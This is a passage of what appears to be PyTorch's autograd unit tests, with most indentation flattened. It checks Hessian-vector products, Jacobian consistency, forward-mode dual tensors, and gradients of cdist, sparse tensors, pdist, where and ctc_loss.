res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
            # A linear function whose Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
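        # For f with Jacobian J, we expect jvp = J @ v and vjp = v @ J; both are
        # checked below against the explicitly computed Jacobian.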
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
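        # Likewise for the Hessian H: hvp should equal H @ v and vhp should equal
        # v @ H, checked against the explicitly computed Hessian.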
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
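            # A tangent whose size matches the primal (here a 2-element slice of
            # the 3-element tensor) should be accepted.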
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
    #   - For memory / version counter share
    #   - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
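    # A minimal usage sketch of the API exercised below (fwAD is the forward-mode
    # AD helper module used throughout these tests):
    #   with fwAD.dual_level():
    #       dual = fwAD.make_dual(primal, tangent)
    #       primal_out, tangent_out = fwAD.unpack_dual(dual)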
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
            # Also, all mentions of "non differentiable view" here mean a non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
            # Updates made through a view of the dual should propagate the tangent as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
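        # After the dual level is exited, the tangent should have been cleared.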
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
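                # The incoming gradient of 1 should be split evenly across all
                # values tied for the min/max/median (three entries of 1/3 here).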
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
            # Shift x away from y wherever they are within eps so that no distance
            # sits exactly at an extremum / non-differentiable point
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
            # Check that the backward pass does not contain invalid
            # values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
        # Parent cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
